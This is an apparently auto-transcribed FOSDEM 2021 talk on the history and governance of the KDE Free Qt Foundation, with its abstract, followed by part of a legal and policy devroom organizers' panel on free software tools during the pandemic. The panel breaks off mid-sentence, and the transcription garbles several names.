Welcome to this presentation, which is part of FOSTA M 2021. My name is Conelius Schumacher, and I would like to tell you the story of the KDE Free Qt Foundation. This is a pretty unique construction, which is in the KDE and Qt community, which is meant to provide a means beyond the licenses to protect the freedom of the underlying software, which is used by the KDE community and the Qt community. So this presentation will show you where this was coming from, how it works, and also what lessons we learned there, and how you could apply that maybe to other situations. Let's get started with a few words about myself. I'm a KDE contributor since 1999. I got into this project because a co-worker of mine, he was following the relevant news groups, he was following what was happening around Linux and other free software projects, and he was interested in this desktop thing. And there was a mailing list where these questions were discussed, and he pointed me to this new project, KDE. So it took me a bit, but I had a look. I found it interesting, found it technically interesting, technically challenging. So I started to write my first patch. And yeah, that's where it started. I'm still there. I started with contributing quite a bit of code, writing all kind of applications. I maintained KOrganizer. That was my first thing into this enterprise where I maintained this application. And from then, I did more development, but I also got into the governance part. In 2003, I joined the KDE Freq Foundation as a representative of KDE for two years. And later, I also was elected into the board of KDE EV. That's the foundation behind the KDE project. We'll talk about this in this presentation a bit later. And I was there, a board member for nine years. And a couple of years of that, I also was the president. My job during all that time was somewhere in the Linux industry today. My current job is open source steward at DB sister. That's the IT daughter of Deutsche Bahn, the German railway company. And my job there is to help teams to contribute to open source software and especially also to use open source software. To understand the story, and we have to start at the beginning. In 1996, this was the year when Windows PCs were quite common. The wind tell had 95% of the PC market. Lots of people were using their subcomputers. The wind tell, the windows on Intel processors. The current version of Microsoft Windows was Windows 95 back then. Windows RT and T also was around. We also had Unix workstations and Unix systems. Quite a bunch of them, a number of Unix systems, different Unix vendors. And they had something there, which was called the common desktop environment. This was a shared project between different vendors to create the user interface for Unix workstations. It worked. It was heavy. It was pretty enterprising project. People on Unix workstation used it, some of them might even have liked it. At that time also Linux continued its successful development. The kernel version 2.0 was released. Also the Linux distributions, they gained traction. Slackware already was around for quite some time. Debian, Ratat and Zuse joined that crew. And they distributed a lot of free software along with the Linux kernel to their users. And one thing which is important to note there is that during this time and through this way of Linux distributions, a lot of end users got in contact with free software based on running on the Linux kernel, but of course expanding in many more projects and full solutions. A lot of that. And the user interface for which you typically had on these Linux distributions was FVWM. And this looked like this. So this is a window manager providing the different user interface elements, providing windows, providing panels, menus, all these things. Lots of fancy things like eyes watching at the mouse pointer. Not a very uniform experience, not very easy to configure, easy to use. So not something you would give to end users or where end users would be really happy with. And this is where Matthias Etrich started. He was a German computer science student back at that time. He was known for looks, user interface for Latech. He developed and he wanted to solve this problem of user interface for end users. So he started with a call which was the birth of the KDE project, a Usenet post on October 14th in 1996. And he said, okay, I want to write user interface for end users, which is supposed to run on Linux and other Unix-like systems. And I need programmers for that. So he asked for 20 to 30 people to come together to start this project, which actually came together to join him in this endeavor. And in his original call, in his original announcement, he had already two firm decisions. The first of them was that the desktop, the project to be developed should be distributed under the terms of the GPL. So it was supposed to be free software available to the community, to the users and the free software conditions so that it would be free and available to everybody. The other decision he took was a technical one. And that was to use the Qt library as a base. Qt was a very new product back then. And he really liked this library because it was technically a very elegant way to solve this problem of creating user interfaces. He believed in the quality and the future of this library. So this was a strong decision where he said, OK, this is the way to go. This is the only technical way we can actually develop fast enough and create quality software which serves this purpose. So we have to use that. That's the best base. And this was made possible by something he also mentioned in the original agreement that TrelTech, the company behind Qt, provided what he said free source code for free software. So they had a special addition which would be available for development of free software. To understand that, we have to go back another five years to the year 1991. This is the year where Linux was created, where the GPLv2 was released, Open Source didn't exist as a term yet. And during this year, two Norwegian programmers, Howard Naut and Eric Chomp-Ang, they sat on a park bench in Trondheim in Norway and discussed their job and what they were doing there. They had to deal with databases and user interfaces. And they saw a gap. They saw a niche to fill. And that was a usable GUI toolkit for cross-platform user interface development in C++. That was their choice for the foundation of this library, this toolkit. And they started to develop that. A couple of years later, they had their first public release. That was Qt 0.9. And you see a screenshot here on the right, some of the widgets in the example which came with the documentation and the library. So the widgets, which could be used to build a desktop or to build other graphical user interface applications in a quite convenient way. So they had a really nice API. They had the power of C++. A lot of people believed in to be the right choice for this, to do this in an object-oriented way. They solved a lot of problems with that. And this release then was the start of the development of the story of Qt, which became the base of KDE as well. Resets of the technical qualities. One thing we have to look at is the model under which Qt was released. They decided on a dual licensing business model. That was innovative at that time. They were one of the first projects to do that, to release their library not only under a traditional proprietary license to which they sold commercially to their customers with support and availability for all the platforms they supported and everything. That's a classic thing to earn money to fund the development of their company. And in addition to that, and that was a new thing, they also provided a free edition, they called the Qt free edition, available for free software development on X11. So that was the platform then later KDE chose to use. And they created a license for that, the Qt free edition license, which had the conditions which would allow to use the Qt free edition for development of free software and only for development of free software. So if you would do proprietary software, then you would have to buy the commercial license. The Qt professional edition under the proprietary license, and you would get the right to develop your proprietary software with that. But for free edition Qt was available. And that's why Matthias took it and why it worked as a base for KDE. But it didn't come without complications because the Qt free edition license created quite some controversy. Because today you would look at the open source definition, you would compare the license with that, the open source definition didn't exist back at that time. So you couldn't certify it as an open source license or something like that. Today if you would apply the criteria of that to this old license, it wouldn't qualify as open source because it had some restrictions which are necessary if you want to really treat that as free software. So Qt itself wasn't completely free. It had some clauses like you couldn't do changes to Qt and distribute the changes and you had to notify TrialTek if you made commercial use of the free edition. So this is something where there were some restrictions. It didn't restrict the development of KDE as a free software project, but Qt itself wasn't free. And there was quite some debate about that and quite some pressure on KDE as well because of this decision from a technical point of view, it made a lot of sense from a licensing point of view, there were open questions. The other question was that what happens if TrialTek stops making Qt available for free software development? So if they cancel the license, if they go proprietary only or if the company goes out of business, there was a reliance on this company and especially as Qt itself was not free in the sense of free software. There was a problem that you couldn't just take it and develop it on your own. You would have to rely on the company to provide it. So this was a dependency which also was critically seen by a number of people. And the third concern there and that was also a concern of the time, Kalle Dahlheimer, one of the early developers of KDE, he points this out. He said, yeah, you have to understand that at that time people were afraid of companies buying other companies to shut down their products. And with Qt, there was a concern that Microsoft would buy it and shut it down because obviously there was some competition. Microsoft was also providing user interfaces libraries for that. So there was competition and people were afraid that maybe because you had this dependency on this one company that this could be used to shut the project down. And this fear wasn't completely unfounded. This is one advertisement Microsoft put in German computer magazines roughly at that time. Were they instilled this fear of Linux not being a reliable operating system? So when they say, okay, if you use this free stuff, you might get mutations. And this of course was a fear which they instilled to undermine this model. So there were concerns about how Microsoft acted at that time, which were not completely out of the sky. In 1997, there was a pivotal moment in KDE's history. This was the first developer meeting in Ansberg, a small town in southern Germany. And this was at that time a lot of people were Linux enthusiasts and they put Linux into their internal IT infrastructure. And there was a company, a manufacturer of Wavefil makers actually, which is still around today. They had Linux enthusiasts who was maintaining systems there. And they invited the KDE developers to come together here. The KDE developers needed a place and they provided them with X terminals and network infrastructure so they could work on KDE. And this was the place where the developers came together to polish KDE, to develop KDE, to write software there, to make it ready for the first stable release. But it also was the place where they were able to really discuss these questions about the licensing and about the threat which was there from the different directions and come to plan how to deal with that. And it hadn't actually at a pretty delicate moment because two weeks before the meeting, GNOME was founded. GNOME as the competitor to KDE as a free software desktop, it was founded partly because of this license controversy. So there was pressure there and there was the need to really decide something. And to this meeting, IRIK, one of the founders and art, one of the first developers at TrollTec, they joined the KDE people at Ansberg at the meeting. They traveled to Germany and joined the group to discuss these questions. And one thing you have to notice that at that time TrollTec was six employees. So not a huge number, but six full-time people working on this toolkit, so providing a base. And KDE already was 200 developers. So the call for developers was quite successful. There was momentum. A lot of people rushed into this as developers to help developing the desktop, developing applications. So in some way, this strategy worked for TrollTec. It worked because there were developers, free software developers using their library. And for KDE, it also worked because there were people and there was a model to actually fund this full-time development of the underlying toolkit. So there they had the discussions about this debate, what to do about it, how to enter the debate about the freedom of queue, because the intention was to make it available for free software. And TrollTec came with a surprising offer. They offered to create a legally binding agreement between the community and the company, which would guarantee that queue stays free forever. So this was something which came as a surprise. KDE didn't expect that. That's not what companies typically would do, give things away just for free. So there was a debate about that. And in the end, they decided, and they came to a conclusion and agreement and said, okay, let's do this. Let's create this agreement to add an additional guarantee for freedom, which is not covered by the license. So a statement of intent was signed. That's a short statement. You see the signatures of the two sides there, the Qt people and the KDE people. And this lies out the fundament of the KDE FreeQt Foundation, what it is and how it works. So the first thing is that the purpose of the foundation was defined to be to keep the Qt free addition available for free software development. It was limited to the X-Windows system, so the system KDE relied on at that time. And the way how this was supposed to work was that in case that the Qt free addition would be stopped, would be discontinued, not developed any further, then the foundation shall have the right to release the Qt free addition under the BSD license. And with that, they would actually with the BSD license, it would open it up to all software development, free or proprietary, and it would also allow to create another company with the same business model or something. So with the BSD license, there would be all freedom. You would need to, in the future also, on one hand, keep Qt free, but also to develop it further and maintain and maybe create a new ecosystem around that. So this was the basic idea. And I tried to explain that to the lawyers when they were formulating the agreement, the community contract they wanted to create here. So they hired a prestigious lawyer and tried to explain them how this was supposed to work. And the lawyer had some trouble there. But finally, he was saying, so you are saying that you want to pay me to create a bulletproof setup so that you can never stop giving something away for free. And that's where Eric said, yes, that's what we want. How does that work? So if we look at the construction in detail, we see the KDE Free Qt Foundation. That's the organization which was created for this purpose and only for this purpose. So very clear scope. And from the two parties, the Trojtek on one hand, the company Owning Qt and KDEV, representing the KDE community, they were sending representatives to this foundation. KDEV didn't exist when the community started to talk about the community contract. So this was one thing which happened back then that the EV was founded. EV is the German abbreviation for registered associations. So that's a typical nonprofit organization in Germany, which is used by hundreds of thousands actually of associations. It's a typical legal nonprofit form. And this is KDE created that for the KDE Free Qt Foundation, but also, of course, to have an organization to back the community in terms of financial representation, legal representation and giving support. So that's what foundations typically do. I mean, nowadays we are very familiar with the concept. At that time it was something newer. It also took some while to get it right and create the bylaws in the right way and so on. But it was put in place in time to sustain the KDE Free Qt Foundation here. And the way how the foundation, the governance in the foundation works is that you have two representatives from each side, two from KDE, two from Atrotek, and they form the board of the foundation. And that's the only people who are there. They vote about things, they discuss things. And there's one special twist here. When votes are done about the agreement, then in case of a tie, the KDE side decides. So the KDE in effect has the majority in this foundation. So that means this agreement to protect Qt and to make it free is something the KDE, under the conditions which are put out in the contract, can trigger even against the will of the company owning Qt. And that's the specific leverage which was put into this foundation to make this guarantee effective. And the details of this mechanism are then in this agreement, the license agreement between Troitek and the KDE Free Qt Foundation, where all the details are formulated, how Troitek gives the license, the conditions when the license can be exercised to release it under the BST license, what has to be taken into account there, what is the process there, and so on. So the license agreement is then what actually has the details about this community contract, what it triggers and what it covers. So these are three elements, our what is there, which is the fundamental construction and setup of the foundation. And there are of course quite some details there. This is just to write it down, what I explained in the diagram. There are a few twists here, for example, the definition of what it means to discontinue Qt is defined in a way that if no major update of the Qt Free Edition is released for 12 months, then the foundation can trigger the agreement and can use it. So there are more of that, we will talk a little bit more about that a little bit later. So what are the consequences of the setup? This protects Qt, the library, the toolkit, which can you rely on for free software development against things which could happen to the owner of Qt. So bankruptcy is one case, the company goes out of business or takeover, another company acquires them and maybe does things in a different way or just a change of plans. Maybe the company would at some point decide to take the library proprietary or to not develop it any further. So for these cases, the agreement provides this protection with a BSD license or this option to release as the BSD license. And this would have these two effects on one hand that Qt could be used for any project for software as well as proprietary. So this would be a very liberal, permissive free version then, which obviously is not compatible with the business model of Trilitec at that time or in general this proprietary copy left business model. So this is really a protection against anything which could happen to the freedom of the project there, the availability of the project for free software development. And the other nice effect of that, which is also I think an important element is that this releasing the project under the BSD license also allows to build up a new company with a similar business model. So somebody else could continue in case the original owner is not able or not willing to continue that anymore. So you could build up a similar model. So you have some more stability guarantees to create a stable environment there, which also would provide at least the opportunity to fund development in a way which is necessary to put in the effort which is required. So after some months of discussion and formulation and negotiation, they finally signed the agreement KDE and Trilitec. They also wrote a press release where they announced the agreement and this contains a nice sentence which I think captures the vision of the agreement quite well. So it ends with we do this to prosper in a mutually supportive fashion. So what they realized there is that preserving the freedom of the library there and the availability for free software development that this is good for both sides. So to put this into a good direction, that was the underlying cause of the agreement and the ambition of the agreement to make this successful for the free software community, but also to the company which is working in this ecosystem. The agreement itself are only three pages. That's quite short. That's the first version. There also is the chart of the foundation which governs this construction about the membership and the voting and the majority and so on. So there's some additional text, but the actual contract about when the conditions are triggered and what happens then, this is in this agreement. Yeah, basically just one page of legal text. And it was just signed in time for KDE 1.0. KDE 1.0 was released July 1998. First version 1.0 based on Qt 1.2. So very early, some of the people who are around for a longer time might remember these versions, some nostalgic thoughts. This was the first stable release and it looked like this. Still not the most beautiful and most advanced desktop, but quite a step forward. So very consistent already and it had a lot of momentum. Lots of people were jumping on this, using it, developing with it. And this was the beginning of a series of quite successful releases. If we look at that at the evolution, KDE 2.0 was released in 2000. Two years later, version 3.0, of course, there were more versions of KDE over time. So this was the continuing development. Also Qt developed and Qt did some license changes. In 1999 with Qt 2.0, Tratec decided to go away from the Qt 3.0 edition license and use a new license. They also wrote that themselves, the QPL. And this license actually was an open source license. So at that time, the OSI was just founded, there was the open source definition and the QPL was accepted as an open source license. So a lot of these debate about the freedom of Qt itself went away at that point. And finally, they decided to do another step and to retire the QPL and move on to the GPL. And that, of course, was the time when we had the standard license. Lots of other people were also using. So this provided the point where Qt would consider it to be free by all the people around. Yeah, in 2005, Tratec did another step because we have talked about the platforms and the Xwindows System, X11. So Qt had this model where the Windows platform was only for commercial customers under the proprietary license. With Qt 4.0, they decided to put the GPL also on the Windows version for Qt. This allowed also for KDE to finally port applications to Windows, make their free software available on this platform as well. So this was a step which extended the scope of the license at this point. One thing which also happened there is that the agreement itself, the KDE FreeQ Qt Foundation agreement was involved. There was a second version of the agreement to adapt to these license changes, to also adapt to this technology, evolution, advancement. So there was another draft of the agreement discussed and negotiated to adapt to that. And one of the central questions of all these adaptations of the agreement was at that time and still is what actually is the Qt 3 edition? So what is a legally complete and binding version of what does it mean to be in the Qt 3 edition? What is contained there? Also what does it mean to release a major update? What does it mean to discontinue that? Would it be possible to move parts of Qt into another product, call it differently, and then release it under a different license? So how do you protect against that? How do you cover the different platforms which are covered by the agreement? So what about Windows? What about maybe future platforms? What is about when the technology changes? And then of course also what licenses are acceptable. So not only the license of Qt itself evolved, but also the GPL for example evolved. There was version 3. So how is this reflected? That's all these questions where then you had the KDE Free Qt Foundation had to put in the work to find answers to them and formulate that in the agreement in a way which was balanced and still binding and serving its purpose. In 2008, KDEv got an email and this email came from the TrollTek founders and they said we sold TrollTek to Nokia. So this was the point in time when the agreement got tested because that's what it was designed for. In case of an acquisition, you have a new situation, a new owner. What happens with that? Will the new owner keep up the freedom which is there? Will he keep up the support for the free software community? And how does the agreement hold there? Is it actually strong enough to survive such an acquisition? And we can now say it was strong enough. KDEv was at the table from the beginning. There were negotiations between KDEv and Nokia. So one of the first meetings, that was an interesting meeting because Nokia managers came to Frankfurt in Germany where KDEv had its first office. We shared this with the Wikimedia Ev in Germany there with one shared employee. So at the very beginning, small office and then we had the Nokia managers coming there. I think it was the day when they published the quarterly earnings numbers and they were proud of how successful the company were. Of course, on a big, big scale at that time. KDEv, of course, was much smaller in terms of organization, but we had the strong community. And I think that was the reason also why this was interesting because Nokia needed the KDE community and the Qt community and the wider community as leverage. That was one of the values they saw in Qt. And the agreement actually enforced that and made it really necessary to have these conversations. Yeah, with Qt 4.5, the LGPL was added. This increased the licensing options there, made it available for use cases which were not covered before. There was a third agreement reflecting these changes with licensing, but also with a new owner. So this can took a round of negotiations. And also a process was started to put Qt under open governance. Up to this point in time Qt was open source, was free software, so you could use it, you could change it, but there was no structured way to contribute to the upstream version. So this changed with the introduction of open governance. So a system was put in place where people could contribute, could also become maintainers of part of Qt who were not working for TrollTag or Nokia then. And this also caused an inflow of software from the KDE community where people contributed their changes they had put on top of Qt and in layer in KDE back into the upstream version to have a more streamlined and better maintained system. Over the next years or the next decade almost there was more evolution, more development. Nokia decided to sell Qt again. They put it into steps into the Finnish company Digia. So they acquired the Qt business and the rights on Qt. Qt 5.0 was released now under the open governance model. Digia also then formed a separate subcompany, the Qt company, that's the owner of Qt today to bundle the Qt business in one company. And this company then in 2016 won public, this is where we are today. Qt 6.0 is the current version released in December. And during these changes again new owners, different legal situation. The agreement also was adapted and was evolved. The fourth agreement, the fifth agreement, continuous evolution there. And we'll talk about that in a second. There is an interesting plot twist. In 2013 Microsoft actually bought Nokia. So at that time Qt already was in the hands of Digia but the fear from the 90s that Microsoft might acquire Qt to do whatever evil things they meant to do to that. This fear almost become reality here but Qt already was not part of Nokia anymore at that time. So nothing happened in this area. Where are we today? What are the lessons we learned? First of all we can say the community contract worked. The mission was accomplished. If we look at the KDE Free Qt Foundation it's around for more than 20 years. It's alive. There are people there working on it. It's not a huge amount of work. It's not a constant activity but it's something which always is when changes occur then these get addressed. And the purpose has been accomplished. Qt stayed free through also sometimes turbulent times. So the different acquisitions. There was a lot of politics and a lot of dynamics there which might have caused trouble but the goal of the foundation to keep Qt free that actually worked. And both KDE and Qt had a lot of success as projects and also impact. So we can say that the original goal was accomplished. And if we look at how that worked I think it's kind of key here to look at the two sides of licenses and this community contract. So if we look at the license that's what guarantees us the present freedom. So if I have the code under the free software license I can use it. I can develop it. I have the freedoms which are guaranteed by the license. So this only is valid for the code I already have. For the future of course I can develop it myself but I have to trust or rely on the people owning the full rights on the code to do what they promise to do. And the community contract adds this additional layer of protecting the future freedom as well. So this is this forward looking thing where you say okay in the future if you stop releasing it then something happens which makes it free. So I have this guarantee for the future. And this is I think a good combination because in addition to that it also adds this need for continuous conversation. So the community has to be in contact with the company and there is this balancing out of interest that happens on an ongoing base. And for this the community contract provides leverage which otherwise just with the license wouldn't be there. There are a few questions which are sometimes asked in the context of the KD3Qt Foundation and one of these is what about a fork? So it's Qt as GPL so we could just fork it right? And that's true. The GPL allows forking obviously. You can develop a new Qt version under the GPL and do your own fork independent of the company or anybody else working on it. Of course there are some drawbacks. The first is obviously it would split the community so if you create a fork then you have in total less people working on each version. So this might be a problem. In addition to that also forking wouldn't allow this model of proprietary dual licensing business model to work. With a fork you can do the GPL version. I mean you can sell products based on top of that but you can't do this proprietary dual licensing thing. Which if this is the way how the development is funded might be a problem if that's not possible anymore. There might not be a sustainable way to fund the fork. And the third thing is that and this is a clause which was added in 2004. The agreement can be terminated if KDE stops using Qt. So this is part of the ongoing balancing between the interests of the community and the company that it was added there to make sure if the KDE community stops using Qt then actually there's no reason anymore there to provide this community contract. The original reason is gone. So in this case TrialTek or the owner, Nokia, Digia, the owner of Qt can terminate the agreement and say yeah you're not using it anymore so you're not bound to these conditions anymore we go in different directions. In this way also KDE becomes kind of the steward of this part of the freedom of Qt for the rest of the free software community so that's something which I think is important and the people in there are aware of to use that in a responsible way. The other question which is often asked is is the KDE Free Qt Foundation a good model for other projects? This dual licensing situation with the proprietary license and free software license or specifically a copy left license is used by the projects or could they also add this additional layer of freedom by adding such a community contract? And I think you have to look at this situation here. I think there are situations where this actually could be an exemplary setup. So if you look at these single vendor projects where vendor holds all the rights to be able to do this model of proprietary license and a copy left license this requires a CLA from contributors so that the vendor has the rights to do the dual licensing and this adds some asymmetry because in this setup the contributors which are contributing to the project they and the community in general they have less rights than the company because they have the rights under the open source license and the free software license that's what all of them have but the company in addition has this additional right to use the proprietary license to fund their business. And this is an asymmetry which can be demotivating or a reason to maybe distrust the company or you have to trust it you have no further leverage. And there the agreement a community contract in the style of the KDE-freeQt Foundation can add some balance there. So you put on the other side the agreement which gives the community additional rights that's this majority situation in the KDE-freeQt Foundation where the agreement can be triggered against the will of the company if the conditions are met. And there you have this shared pledge for the future that the freedom is there which also gives people more guarantees for contributors more safety that they can actually be sure that the software is available under the conditions they are trusting in and you have this legal box to balance out the imbalance of the CLA. So that's where something like that could work. One thing you have to be aware of is that this requires some maintenance. This is the contract how it looks today and the latest version of the agreement the license agreement. It's not three pages anymore. It's some more pages. And the questions we discussed before about what is in Qt, what licenses are covered, what platforms are covered and so on. So this was formulated in more detail and fleshed out and adapted to the current situation and more components came into that. So obviously with the development over many years many factors change and some of these have to be reflected in the agreement. That's what happened there. On the other hand you also have to look at that. That's more than 20 years of development adding 10 pages to a contract in 20 years is something which actually can be a reasonable effort. And to just visualize the development a little bit better here. So this is the scope of the licenses and the agreement over time over the 25 years of history here. License wise we went from the Qt 3 edition over the QPL and the GPL then now to the combination of GPL and LGPL. The community contract at the beginning only covered X11. Windows was also around but not covered by the agreement. So the KDE ports to Windows at the point where Qt was available under the GPL were possible but this additional safety that the Windows version would still be there for the time being and for the future. There was no additional guarantee there. So this was only added quite a bit later where the community contract was expanded to also cover the Qt version on the Windows platform. There are two more things I would like to mention in this diagram. So one is Wayland. This is in this dotted lines box here because it's kind of covered by the agreement. The agreement says and that also was something which was added later over time that not only X11 is covered by also any successor of the system. What a successor is is something which is determined by the board of the KDE Freq foundation. In this case actually the simple majority where KDE decides is not sufficient. So this is not completely cleared yet if Wayland covers falls under this condition or not. So this is something where eventually maybe another change in the agreement is necessary. And the other thing is Android. Android is actually the support for Android. So the mobile platforms, the desktop platforms were covered from the beginning. Also MacOS which then always was under the community contract. The mobile platforms were only added later. Android actually was there from the beginning because this emerged from the KDE community. So the KDE community developed the support for Android and then later contributed it to the Qt project. And this happened under the condition that the community contract would be extended to also cover Android. So that shows again this example where the ongoing conversation there helped to shape the conditions in a balanced way. Good for the community, but also of course good for the company because Android was added. Later this also was extended to iOS, that's where we are today. There are a few other platforms which are there, but these are the most relevant from the KDE and Free Software Point of View. The last thing which I think you have to consider if you are looking at this kind of community contract, this kind of agreement is that it takes courage to do that because it has this future perspective where you are the thing Eric had trouble explaining to his lawyer that he wants to make sure that he can't stop giving something away for free. That's of course a bet in the future, a bet on the power of the Free Software community and the power of the model also on the quality of the product and the development and the people around that. So it takes courage. It was about move, but it did work because people put in the effort to make it work. Yeah, so KDE FreeQ Foundation, we talked a lot about legal rights, about licenses, about contracts, about community, about the details of how this developed and how this works and what are the pitfalls there, what are the advantages. But I think the fundamental thing here to look at is actually freedom. This is the core of the KDE FreeQ Foundation because freedom is good for business and it's good for the community and in general it's good for the world. And the statement from the original announcement of the KDE FreeQ Foundation, I think this captures it beautifully because it says, we want to prosper in a mutually supportive fashion and that's what is enabled by going away which is based on freedom. So thank you for watching this presentation. We are at the end of the story. I'm happy to talk more about that. So if you want to discuss it, please feel free to reach out to me and I wish you have fun with more presentation of OSDEM 2021 and stay safe.
|
When the initial release of Qt was published in 1995, it was one of the first projects to use a dual-licensing model. This model, LGPL and a proprietary commercial license today, has served the project well for more than 25 years. It is less well known that the dual-licensing model is supported by a community contract which guarantees the freedom of Qt beyond what is in the license covered. This contract is maintained by the KDE Free Qt Foundation and has kept Qt free through multiple acquisitions and other turbulences. This presentation will explain the community contract, how it augments the dual-licensing model, and how it has evolved and served its purpose for 25 years and counting. It will also discuss what are the lessons learned and how it can serve as a model for projects today. The KDE Free Qt Foundation was born from a heated dispute about open source licenses in the late nineties. It resulted in a unique mechanism to ensure software freedom for the Qt and KDE ecosystems through a contract between the community and the company owning the project. It has stood the test of time and got the community a seat at the negotiation table going through multiple acqisitions. The contract between the KDE Free Qt Foundation and what is today The Qt Company gives the community a say in any license changes to Qt. It guarantees that there is the base for a sustainable model to provide Qt under an open source license and a corresponding open source based business model. With this it goes beyond what licenses cover. It is the counterpart to CLAs as it's constructed asymmetrically in favor of the community. That it has preserved the freedom of Qt through multiple acquisitions, among them Nokia buying and selling the technology, is a testament for the effectiveness of this setup. The presentation is based on a series of conversations with the people involved and first-hand experience from serving as a representative of the KDE Free Qt Foundation.
|
10.5446/56839 (DOI)
|
Hi, and welcome to the organizers panel of the legal and policy dev room at FOSDEM. You stuck with us this long. This is the end of our second afternoon of material and we organizers wanted to come here talk about a few relevant topics of the day and say hello to you and tell you who we are. So shall we introduce ourselves, everybody? Some of us have already been on moderating panels, but my name is Karen Sandler. I'm the executive director of the software freedom conservancy. I care about software freedom because I'm a cyborg lawyer and I have a pacemaker defibrillator implanted and I would love to see the service code in my own body. So Alex. Okay, I'm Alexander Sander. I'm a policy consultant and yeah, therefore, I'm trying to make sure that everybody in the European Union knows about free software and the advantages of free software and especially decision makers and yeah, so that's my job. And I hand over to Bradley. So I'm Bradley Kuhn from software freedom conservancy. I'm the policy fellow there. I've been helping organize this panel for a while and excited to work with our new team that those of you who have seen our panel in person at FOSDEM in the past see that we're a little different group here. So Richard. Oh, Max. I just continue. All right. So my name is Max Miel. I work for the Free Software Foundation Europe. I work there in different areas, started with policy and meanwhile also more in the legal area where I coordinate a few initiatives like reuse for instance, which we will definitely talk about later. And yeah, I stuck with the FSB for a long time and yeah, I care about free software too as many of the most or all people here in this panel. I'm Richard Fontana. I'm a lawyer at Red Hat. My work involves mostly open source and free software related legal matters and I've been doing that for a long time. And I've been involved in some way in helping organize this step room, excuse me, since pretty much the beginning. So happy to be here again. Yes. And now is a really good opportunity to say thanks to my fellow CORE organizers who have done this all of these years with me and thanks to our new organizers for participating with us. It's been a really, really challenging and also fun year as it turned out thanks to all of your participation. I want to take a moment to thank Tom Marble who had been a co-organizer for previous DevRAMS who always worked so, so hard. We keenly missed his absence this year and I hope he's watching along and know that we really appreciate all of his past work and have thought about what he would say at every step of the process. I'm sure he's watching right now and will be saying something in IRC for those of you following along in the chat. So I think that leads us perfectly to the first topic to talk about. Normally on this panel we talk about what we see are themes that come up in our DevRAMS or really important issues of the day. And I think one of the things that is the most poignant is simply events in the age of COVID and how operating during the pandemic is an opportunity for software freedom but also a challenge as proprietary solutions are foisted upon us. Yeah, I've been watching this really carefully this year and I'm very concerned that the video chat quickly became a center of how people got their work done and at least here in the United States and I'm curious to hear from my European colleagues that's happened there. It's so dominated by a single proprietary software company, namely Zoom, that people in the United States use Zoom as a verb to mean video chat now. They talk about doing a Zoom, talking on Zoom, being on Zoom. And it's very frustrating to even tell people that there's an alternative that's available. We're using Big Blue Button to record this panel. Jitsi is being used by Fosdom to do the live chat during the conference. And they are excellent free software technologies that we just have had great challenges, at least we've seen here in the US, getting others to pay attention to. Are you all seeing the same thing in Europe, has it been difficult to get people to switch off proprietary video chat platforms? I would say definitely, yeah. We had those issues as well, especially in the beginning of the pandemic. But I have to say that we also saw a lot of positive examples here. Like for instance in the educational sector, Big Blue Button is a known thing. I know a few students right now, younger and older, and most of them are aware of using Big Blue Button when I invited them for an association's meeting. So at least that's some good news. And we have a lot of activists who spread the word about those alternatives, not only regarding video chat, but also other collaboration tools that we see. So there's also a pride side of things. Also maybe to add here, what we've seen in the very beginning of the crisis is that many companies use the term free software in order to promote their software, which isn't free software. And it's more likely a shareware, a freeware or whatever. And they had subscription for three months or stuff like this. And they really tried to get on the market with using the term free software. And this is also what we've seen in the beginning and what we tried to challenge with some news articles and press release on that. But yeah, this is also something we should keep in mind for future that the term free software is not connected to these kinds of offers. Yeah, indeed. And since the early 2000s, I've encouraged people to just at least in speaking in English to say software freedom instead, because it's less ambiguous. Do you have software freedom is the question to ask people. And it's not just happening, I think with video chat during the pandemic. There's just this whole group of proprietary technologies, many of which replace technologies that were invented in free software. So if you look at things like Slack and other proprietary technologies, we've had free software chat clients since the beginning of the internet in the early 1990s. And now these companies have found a way to sort of insinuate proprietary technologies that replace standing free software applications in the marketplace. And so it was so bad that I recently participated in an online conference where every technology for the speakers was a proprietary technology. The speaker's guide was in Google Docs and the back. It wasn't on Slack, but it was on Discord was the speaker chat and the video platform for recording talks was proprietary and the online collaborate, the venue platform for the day of was a semi free software license under a non-commercial use only style license. So even free software conferences are having a challenge. It's kind of, it's very impressive that FOSDEM, while it's been certainly very difficult to organize as a dev room remotely this year, one of the things that one of the organizers of FOSDEM told me last week was that their goal was to prove to the world that you could run a conference as large as FOSDEM as an online event during COVID using only free software. And they've, as we've seen as last two days, they have succeeded and we've pulled this off. So it's really impressive. And while I, well, I've had my frustrations of trying to organize this event remotely. It has not been fun. I wish Tom Marvel was back many times and he's been laughing at me every time I talk to him appropriately so because he did all the work in the previous years. I'm really glad that this has happened so that we can show that these events can be done with all free software. Yeah, I was going to say that I don't actually feel like this year, this past year has been really significantly different. And I think that's one of the points you're making, Bradley. I've watched the proliferation of non-free, non-open source tools even in sort of technical or developer communities that are oriented towards free software development for almost as long as I've been involved in kind of doing legal work in this area at least, maybe not going back further than that. So maybe things have accelerated somewhat, but I see it more as a continuation of a pattern. I think that's true. And I think that, like, I think that what we saw was like a highlighting and exacerbation of that trend. And seeing that happen in the health space and we had a whole panel that mostly talked about this issue. You know, I think that the idea of focusing on software freedom has never been more important because so many of these non-free sharing solutions are being promulgated and people think that they're helpful in an immediate emergency like the MENTRONIC ventilator that has your, you know, that is allowed for use but doesn't grant the rights to go forward. We're planning for this pandemic and our emergency needs, but we're not planning for the next pandemic. Yeah, I think, Fontana, you're absolutely correct that this has been an ongoing problem that's been exacerbated, especially in the developer communities. When I think about it, just to compare it to some of the other panels we had in the compliance panel, we didn't talk too much about the compliance tools thing. And the main reason as a moderator, I didn't push on that issue so much is because I know many of the, most of the tools that people use, software tools are non-free. Falsology was mentioned on the panel, which is the only FOSS tool for compliance, more or less. There's a few others, but it's certainly the most popular one. All the other tools that are very popular are proprietary. And even the collaboration communities that develop those standards and tools, they're using proprietary software, a major compliance tools process, you have to agree to a proprietary license and agree not to reverse engineer the mailing list software just to join the mailing list of that project. So we're really seeing that become more and more that people doing FOSS aren't using FOSS tools. And I can't help but mention GitHub, which is the most popular FOSS development site, is a proprietary software site with tons of proprietary JavaScript that people are using to develop FOSS every day. So I think that's something that the pandemic has just made more obvious, but you're absolutely right on time. It was there for some time now. Yeah, it's sad because we actually have the tools, like we have the alternate tools that work like Big Blue Bun. And if we were all to put our weight behind them, they would improve. And it would be this amazing thing, but instead, because we're instead as a society doubling down on these proprietary solutions, and we free software contributors are the ones who are locking that in. So what do folks think? So what are some other themes that you think have come up over the last year that we ought to address? Is there anything else that was major that happened this year that we should be sure to talk about? I mean, in terms of health, what I found kind of really interesting was the discussions about the tracing apps. So there's also somehow a light at the end of the tunnel and this discussion around these tracing apps and interoperability and that we can share data across borders, especially in Europe. That's an issue. And so this helped a lot, especially on the decision maker side. So they now have a better understanding of 